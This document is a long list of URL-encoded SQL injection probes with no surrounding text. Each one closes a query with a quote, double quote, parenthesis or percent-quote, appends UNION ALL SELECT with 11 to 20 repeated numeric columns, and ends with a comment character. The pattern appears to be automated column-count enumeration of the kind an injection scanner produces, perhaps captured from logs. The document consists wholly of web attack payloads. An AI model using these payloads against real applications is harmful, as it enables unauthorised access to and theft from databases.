-4375%27%20UNION%20ALL%20SELECT%209411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%23 -4595%27%20UNION%20ALL%20SELECT%203418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%2C3418%23 -3108%27%20UNION%20ALL%20SELECT%201185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%23 -5203%27%20UNION%20ALL%20SELECT%209175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%2C9175%23 -6177%27%20UNION%20ALL%20SELECT%209789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%23 -7379%27%20UNION%20ALL%20SELECT%209598%2C9598%2C9598%2C9598%2C9598%2C9598%2C9598%2C9598%2C9598%2C9598%2C9598%2C9598%2C9598%2C9598%2C9598%2C9598%2C9598%2C9598%2C9598%23 -6202%27%20UNION%20ALL%20SELECT%204762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%23 -6124%22%29%20UNION%20ALL%20SELECT%208682%2C8682%2C8682%2C8682%2C8682%2C8682%2C8682%2C8682%2C8682%2C8682%2C8682%23 -5470%22%29%20UNION%20ALL%20SELECT%203482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%23 -9206%22%29%20UNION%20ALL%20SELECT%201167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%23 -5262%22%29%20UNION%20ALL%20SELECT%207717%2C7717%2C7717%2C7717%2C7717%2C7717%2C7717%2C7717%2C7717%2C7717%2C7717%2C7717%2C7717%2C7717%23 -8493%22%29%20UNION%20ALL%20SELECT%201370%2C1370%2C1370%2C1370%2C1370%2C1370%2C1370%2C1370%2C1370%2C1370%2C1370%2C1370%2C1370%2C1370%2C1370%23 -5450%22%29%20UNION%20ALL%20SELECT%203588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%23 -3398%22%29%20UNION%20ALL%20SELECT%204766%2C4766%2C4766%2C4766%2C4766%2C4766%2C4766%2C4766%2C4766%2C4766%2C4766%2C4766%2C4766%2C4766%2C4766%2C4766%2C4766%23 -4957%22%29%20UNION%20ALL%20SELECT%202082%2C2082%2C2082%2C2082%2C2082%2C2082%2C2082%2C2082%2C2082%2C2082%2C2082%2C2082%2C2082%2C2082%2C2082%2C2082%2C2082%2C2082%23 -2539%22%29%20UNION%20ALL%20SELECT%208931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%23 -8474%22%29%20UNION%20ALL%20SELECT%209163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%23 -1569%22%29%29%20UNION%20ALL%20SELECT%209942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%23 -1236%22%29%29%20UNION%20ALL%20SELECT%208667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%2C8667%23 -1899%22%29%29%20UNION%20ALL%20SELECT%208265%2C8265%2C8265%2C8265%2C8265%2C8265%2C8265%2C8265%2C8265%2C8265%2C8265%2C8265%2C8265%23 -9801%22%29%29%20UNION%20ALL%20SELECT%204256%2C4256%2C4256%2C4256%2C4256%2C4256%2C4256%2C4256%2C4256%2C4256%2C4256%2C4256%2C4256%2C4256%23 -9763%22%29%29%20UNION%20ALL%20SELECT%207995%2C7995%2C7995%2C7995%2C7995%2C7995%2C7995%2C7995%2C7995%2C7995%2C7995%2C7995%2C7995%2C7995%2C7995%23 -7925%22%29%29%20UNION%20ALL%20SELECT%206330%2C6330%2C6330%2C6330%2C6330%2C6330%2C6330%2C6330%2C6330%2C6330%2C6330%2C6330%2C6330%2C6330%2C6330%2C6330%23 -1943%22%29%29%20UNION%20ALL%20SELECT%204560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%2C4560%23 -4293%22%29%29%20UNION%20ALL%20SELECT%203929%2C3929%2C3929%2C3929%2C3929%2C3929%2C3929%2C3929%2C3929%2C3929%2C3929%2C3929%2C3929%2C3929%2C3929%2C3929%2C3929%2C3929%23 -7705%22%29%29%20UNION%20ALL%20SELECT%204045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%23 -4697%22%29%29%20UNION%20ALL%20SELECT%207739%2C7739%2C7739%2C7739%2C7739%2C7739%2C7739%2C7739%2C7739%2C7739%2C7739%2C7739%2C7739%2C7739%2C7739%2C7739%2C7739%2C7739%2C7739%2C7739%23 -8410%22%29%29%29%20UNION%20ALL%20SELECT%209224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%23 -3129%22%29%29%29%20UNION%20ALL%20SELECT%205409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%2C5409%23 -3318%22%29%29%29%20UNION%20ALL%20SELECT%208787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%23 -8930%22%29%29%29%20UNION%20ALL%20SELECT%209638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%23 -4302%22%29%29%29%20UNION%20ALL%20SELECT%205236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%2C5236%23 -7388%22%29%29%29%20UNION%20ALL%20SELECT%205167%2C5167%2C5167%2C5167%2C5167%2C5167%2C5167%2C5167%2C5167%2C5167%2C5167%2C5167%2C5167%2C5167%2C5167%2C5167%23 -6828%22%29%29%29%20UNION%20ALL%20SELECT%204676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%23 -2072%22%29%29%29%20UNION%20ALL%20SELECT%202323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%23 -8834%22%29%29%29%20UNION%20ALL%20SELECT%206221%2C6221%2C6221%2C6221%2C6221%2C6221%2C6221%2C6221%2C6221%2C6221%2C6221%2C6221%2C6221%2C6221%2C6221%2C6221%2C6221%2C6221%2C6221%23 -9004%22%29%29%29%20UNION%20ALL%20SELECT%201742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%23 -2725%22%20UNION%20ALL%20SELECT%203886%2C3886%2C3886%2C3886%2C3886%2C3886%2C3886%2C3886%2C3886%2C3886%2C3886%23 -7038%22%20UNION%20ALL%20SELECT%201912%2C1912%2C1912%2C1912%2C1912%2C1912%2C1912%2C1912%2C1912%2C1912%2C1912%2C1912%23 -5974%22%20UNION%20ALL%20SELECT%203229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%23 -4601%22%20UNION%20ALL%20SELECT%207660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%23 -6240%22%20UNION%20ALL%20SELECT%206898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%23 -3430%22%20UNION%20ALL%20SELECT%204201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%2C4201%23 -3246%22%20UNION%20ALL%20SELECT%208049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%23 -5105%22%20UNION%20ALL%20SELECT%207091%2C7091%2C7091%2C7091%2C7091%2C7091%2C7091%2C7091%2C7091%2C7091%2C7091%2C7091%2C7091%2C7091%2C7091%2C7091%2C7091%2C7091%23 -6299%22%20UNION%20ALL%20SELECT%208755%2C8755%2C8755%2C8755%2C8755%2C8755%2C8755%2C8755%2C8755%2C8755%2C8755%2C8755%2C8755%2C8755%2C8755%2C8755%2C8755%2C8755%2C8755%23 -4554%22%20UNION%20ALL%20SELECT%205399%2C5399%2C5399%2C5399%2C5399%2C5399%2C5399%2C5399%2C5399%2C5399%2C5399%2C5399%2C5399%2C5399%2C5399%2C5399%2C5399%2C5399%2C5399%2C5399%23 -9457%22%29%20UNION%20ALL%20SELECT%203592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%23 -9017%22%29%20UNION%20ALL%20SELECT%202149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%23 -8453%22%29%20UNION%20ALL%20SELECT%201570%2C1570%2C1570%2C1570%2C1570%2C1570%2C1570%2C1570%2C1570%2C1570%2C1570%2C1570%2C1570%23 -4660%22%29%20UNION%20ALL%20SELECT%202717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%2C2717%23 -6179%22%29%20UNION%20ALL%20SELECT%206177%2C6177%2C6177%2C6177%2C6177%2C6177%2C6177%2C6177%2C6177%2C6177%2C6177%2C6177%2C6177%2C6177%2C6177%23 -1103%22%29%20UNION%20ALL%20SELECT%204666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%23 -9794%22%29%20UNION%20ALL%20SELECT%209884%2C9884%2C9884%2C9884%2C9884%2C9884%2C9884%2C9884%2C9884%2C9884%2C9884%2C9884%2C9884%2C9884%2C9884%2C9884%2C9884%23 -1974%22%29%20UNION%20ALL%20SELECT%202957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%23 -4169%22%29%20UNION%20ALL%20SELECT%201333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%23 -8745%22%29%20UNION%20ALL%20SELECT%207573%2C7573%2C7573%2C7573%2C7573%2C7573%2C7573%2C7573%2C7573%2C7573%2C7573%2C7573%2C7573%2C7573%2C7573%2C7573%2C7573%2C7573%2C7573%2C7573%23 -5252%22%29%29%20UNION%20ALL%20SELECT%202132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%2C2132%23 -9390%22%29%29%20UNION%20ALL%20SELECT%205246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%2C5246%23 -1783%22%29%29%20UNION%20ALL%20SELECT%207697%2C7697%2C7697%2C7697%2C7697%2C7697%2C7697%2C7697%2C7697%2C7697%2C7697%2C7697%2C7697%23 -8182%22%29%29%20UNION%20ALL%20SELECT%205061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%23 -6994%22%29%29%20UNION%20ALL%20SELECT%201728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%2C1728%23 -2943%22%29%29%20UNION%20ALL%20SELECT%203365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%23 -5745%22%29%29%20UNION%20ALL%20SELECT%205889%2C5889%2C5889%2C5889%2C5889%2C5889%2C5889%2C5889%2C5889%2C5889%2C5889%2C5889%2C5889%2C5889%2C5889%2C5889%2C5889%23 -4145%22%29%29%20UNION%20ALL%20SELECT%202035%2C2035%2C2035%2C2035%2C2035%2C2035%2C2035%2C2035%2C2035%2C2035%2C2035%2C2035%2C2035%2C2035%2C2035%2C2035%2C2035%2C2035%23 -1307%22%29%29%20UNION%20ALL%20SELECT%201643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%23 -7632%22%29%29%20UNION%20ALL%20SELECT%209220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%2C9220%23 -6868%22%29%29%29%20UNION%20ALL%20SELECT%201123%2C1123%2C1123%2C1123%2C1123%2C1123%2C1123%2C1123%2C1123%2C1123%2C1123%23 -1649%22%29%29%29%20UNION%20ALL%20SELECT%201167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%23 -3908%22%29%29%29%20UNION%20ALL%20SELECT%205079%2C5079%2C5079%2C5079%2C5079%2C5079%2C5079%2C5079%2C5079%2C5079%2C5079%2C5079%2C5079%23 -4782%22%29%29%29%20UNION%20ALL%20SELECT%201721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%23 -7619%22%29%29%29%20UNION%20ALL%20SELECT%201407%2C1407%2C1407%2C1407%2C1407%2C1407%2C1407%2C1407%2C1407%2C1407%2C1407%2C1407%2C1407%2C1407%2C1407%23 -8048%22%29%29%29%20UNION%20ALL%20SELECT%205557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%23 -1440%22%29%29%29%20UNION%20ALL%20SELECT%201404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%23 -8431%22%29%29%29%20UNION%20ALL%20SELECT%207346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%2C7346%23 -4801%22%29%29%29%20UNION%20ALL%20SELECT%206779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%2C6779%23 -4732%22%29%29%29%20UNION%20ALL%20SELECT%203705%2C3705%2C3705%2C3705%2C3705%2C3705%2C3705%2C3705%2C3705%2C3705%2C3705%2C3705%2C3705%2C3705%2C3705%2C3705%2C3705%2C3705%2C3705%2C3705%23 -2981%22%20UNION%20ALL%20SELECT%209489%2C9489%2C9489%2C9489%2C9489%2C9489%2C9489%2C9489%2C9489%2C9489%2C9489%23 -7077%22%20UNION%20ALL%20SELECT%204042%2C4042%2C4042%2C4042%2C4042%2C4042%2C4042%2C4042%2C4042%2C4042%2C4042%2C4042%23 -8158%22%20UNION%20ALL%20SELECT%209119%2C9119%2C9119%2C9119%2C9119%2C9119%2C9119%2C9119%2C9119%2C9119%2C9119%2C9119%2C9119%23 -2277%22%20UNION%20ALL%20SELECT%208145%2C8145%2C8145%2C8145%2C8145%2C8145%2C8145%2C8145%2C8145%2C8145%2C8145%2C8145%2C8145%2C8145%23 -5028%22%20UNION%20ALL%20SELECT%208881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%23 -6547%22%20UNION%20ALL%20SELECT%206699%2C6699%2C6699%2C6699%2C6699%2C6699%2C6699%2C6699%2C6699%2C6699%2C6699%2C6699%2C6699%2C6699%2C6699%2C6699%23 -3175%22%20UNION%20ALL%20SELECT%207610%2C7610%2C7610%2C7610%2C7610%2C7610%2C7610%2C7610%2C7610%2C7610%2C7610%2C7610%2C7610%2C7610%2C7610%2C7610%2C7610%23 -5311%22%20UNION%20ALL%20SELECT%204392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%23 -9761%22%20UNION%20ALL%20SELECT%207036%2C7036%2C7036%2C7036%2C7036%2C7036%2C7036%2C7036%2C7036%2C7036%2C7036%2C7036%2C7036%2C7036%2C7036%2C7036%2C7036%2C7036%2C7036%23 -5172%22%20UNION%20ALL%20SELECT%201643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%23 -5219%25%27%29%20UNION%20ALL%20SELECT%202078%2C2078%2C2078%2C2078%2C2078%2C2078%2C2078%2C2078%2C2078%2C2078%2C2078%23 -6519%25%27%29%20UNION%20ALL%20SELECT%207676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%23 -5250%25%27%29%20UNION%20ALL%20SELECT%208409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%23 -4240%25%27%29%20UNION%20ALL%20SELECT%209887%2C9887%2C9887%2C9887%2C9887%2C9887%2C9887%2C9887%2C9887%2C9887%2C9887%2C9887%2C9887%2C9887%23 -3434%25%27%29%20UNION%20ALL%20SELECT%205418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%2C5418%23 -6221%25%27%29%20UNION%20ALL%20SELECT%203313%2C3313%2C3313%2C3313%2C3313%2C3313%2C3313%2C3313%2C3313%2C3313%2C3313%2C3313%2C3313%2C3313%2C3313%2C3313%23 -6153%25%27%29%20UNION%20ALL%20SELECT%206433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%23 -6979%25%27%29%20UNION%20ALL%20SELECT%204181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%23 -3621%25%27%29%20UNION%20ALL%20SELECT%201582%2C1582%2C1582%2C1582%2C1582%2C1582%2C1582%2C1582%2C1582%2C1582%2C1582%2C1582%2C1582%2C1582%2C1582%2C1582%2C1582%2C1582%2C1582%23 -8681%25%27%29%20UNION%20ALL%20SELECT%209961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%23 -1676%25%27%29%29%20UNION%20ALL%20SELECT%206353%2C6353%2C6353%2C6353%2C6353%2C6353%2C6353%2C6353%2C6353%2C6353%2C6353%23 -6109%25%27%29%29%20UNION%20ALL%20SELECT%204144%2C4144%2C4144%2C4144%2C4144%2C4144%2C4144%2C4144%2C4144%2C4144%2C4144%2C4144%23 -2264%25%27%29%29%20UNION%20ALL%20SELECT%206664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%23 -4018%25%27%29%29%20UNION%20ALL%20SELECT%206131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%23 -3355%25%27%29%29%20UNION%20ALL%20SELECT%205322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%23 -1410%25%27%29%29%20UNION%20ALL%20SELECT%205322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%2C5322%23 -3394%25%27%29%29%20UNION%20ALL%20SELECT%205918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%23 -2517%25%27%29%29%20UNION%20ALL%20SELECT%207020%2C7020%2C7020%2C7020%2C7020%2C7020%2C7020%2C7020%2C7020%2C7020%2C7020%2C7020%2C7020%2C7020%2C7020%2C7020%2C7020%2C7020%23 -5181%25%27%29%29%20UNION%20ALL%20SELECT%209271%2C9271%2C9271%2C9271%2C9271%2C9271%2C9271%2C9271%2C9271%2C9271%2C9271%2C9271%2C9271%2C9271%2C9271%2C9271%2C9271%2C9271%2C9271%23 -7865%25%27%29%29%20UNION%20ALL%20SELECT%202534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%23 -2117%25%27%29%29%29%20UNION%20ALL%20SELECT%206303%2C6303%2C6303%2C6303%2C6303%2C6303%2C6303%2C6303%2C6303%2C6303%2C6303%23 -9747%25%27%29%29%29%20UNION%20ALL%20SELECT%207958%2C7958%2C7958%2C7958%2C7958%2C7958%2C7958%2C7958%2C7958%2C7958%2C7958%2C7958%23 -9396%25%27%29%29%29%20UNION%20ALL%20SELECT%203247%2C3247%2C3247%2C3247%2C3247%2C3247%2C3247%2C3247%2C3247%2C3247%2C3247%2C3247%2C3247%23 -2026%25%27%29%29%29%20UNION%20ALL%20SELECT%202904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%2C2904%23 -2505%25%27%29%29%29%20UNION%20ALL%20SELECT%204535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%23 -4218%25%27%29%29%29%20UNION%20ALL%20SELECT%201351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%23 -9778%25%27%29%29%29%20UNION%20ALL%20SELECT%204124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%2C4124%23 -1024%25%27%29%29%29%20UNION%20ALL%20SELECT%209713%2C9713%2C9713%2C9713%2C9713%2C9713%2C9713%2C9713%2C9713%2C9713%2C9713%2C9713%2C9713%2C9713%2C9713%2C9713%2C9713%2C9713%23 -6117%25%27%29%29%29%20UNION%20ALL%20SELECT%209433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%23 -7132%25%27%29%29%29%20UNION%20ALL%20SELECT%206563%2C6563%2C6563%2C6563%2C6563%2C6563%2C6563%2C6563%2C6563%2C6563%2C6563%2C6563%2C6563%2C6563%2C6563%2C6563%2C6563%2C6563%2C6563%2C6563%23 -8023%25%27%20UNION%20ALL%20SELECT%205722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%2C5722%23 -8082%25%27%20UNION%20ALL%20SELECT%204402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%23 -2980%25%27%20UNION%20ALL%20SELECT%208640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%23 -8882%25%27%20UNION%20ALL%20SELECT%201201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%23 -2904%25%27%20UNION%20ALL%20SELECT%206824%2C6824%2C6824%2C6824%2C6824%2C6824%2C6824%2C6824%2C6824%2C6824%2C6824%2C6824%2C6824%2C6824%2C6824%23 -5663%25%27%20UNION%20ALL%20SELECT%201912%2C1912%2C1912%2C1912%2C1912%2C1912%2C1912%2C1912%2C1912%2C1912%2C1912%2C1912%2C1912%2C1912%2C1912%2C1912%23 -4893%25%27%20UNION%20ALL%20SELECT%208005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%23 -8557%25%27%20UNION%20ALL%20SELECT%208331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%2C8331%23 -5610%25%27%20UNION%20ALL%20SELECT%207761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%2C7761%23 -4290%25%27%20UNION%20ALL%20SELECT%202478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%2C2478%23 -9739%00%27%29%20UNION%20ALL%20SELECT%204636%2C4636%2C4636%2C4636%2C4636%2C4636%2C4636%2C4636%2C4636%2C4636%2C4636%23 -6593%00%27%29%20UNION%20ALL%20SELECT%202199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%23 -5942%00%27%29%20UNION%20ALL%20SELECT%208559%2C8559%2C8559%2C8559%2C8559%2C8559%2C8559%2C8559%2C8559%2C8559%2C8559%2C8559%2C8559%23 -6008%00%27%29%20UNION%20ALL%20SELECT%202118%2C2118%2C2118%2C2118%2C2118%2C2118%2C2118%2C2118%2C2118%2C2118%2C2118%2C2118%2C2118%2C2118%23 -5420%00%27%29%20UNION%20ALL%20SELECT%205910%2C5910%2C5910%2C5910%2C5910%2C5910%2C5910%2C5910%2C5910%2C5910%2C5910%2C5910%2C5910%2C5910%2C5910%23 -8338%00%27%29%20UNION%20ALL%20SELECT%207611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%23 -3360%00%27%29%20UNION%20ALL%20SELECT%208734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%23 -1097%00%27%29%20UNION%20ALL%20SELECT%209879%2C9879%2C9879%2C9879%2C9879%2C9879%2C9879%2C9879%2C9879%2C9879%2C9879%2C9879%2C9879%2C9879%2C9879%2C9879%2C9879%2C9879%23 -9039%00%27%29%20UNION%20ALL%20SELECT%201689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%23 -8047%00%27%29%20UNION%20ALL%20SELECT%206819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%23 -8926%00%27%20UNION%20ALL%20SELECT%202415%2C2415%2C2415%2C2415%2C2415%2C2415%2C2415%2C2415%2C2415%2C2415%2C2415%23 -4948%00%27%20UNION%20ALL%20SELECT%206440%2C6440%2C6440%2C6440%2C6440%2C6440%2C6440%2C6440%2C6440%2C6440%2C6440%2C6440%23 -5965%00%27%20UNION%20ALL%20SELECT%204379%2C4379%2C4379%2C4379%2C4379%2C4379%2C4379%2C4379%2C4379%2C4379%2C4379%2C4379%2C4379%23 -7670%00%27%20UNION%20ALL%20SELECT%206937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%2C6937%23 -1774%00%27%20UNION%20ALL%20SELECT%207590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%23 -5371%00%27%20UNION%20ALL%20SELECT%202003%2C2003%2C2003%2C2003%2C2003%2C2003%2C2003%2C2003%2C2003%2C2003%2C2003%2C2003%2C2003%2C2003%2C2003%2C2003%23 -2073%00%27%20UNION%20ALL%20SELECT%202957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%2C2957%23 -3831%00%27%20UNION%20ALL%20SELECT%201141%2C1141%2C1141%2C1141%2C1141%2C1141%2C1141%2C1141%2C1141%2C1141%2C1141%2C1141%2C1141%2C1141%2C1141%2C1141%2C1141%2C1141%23 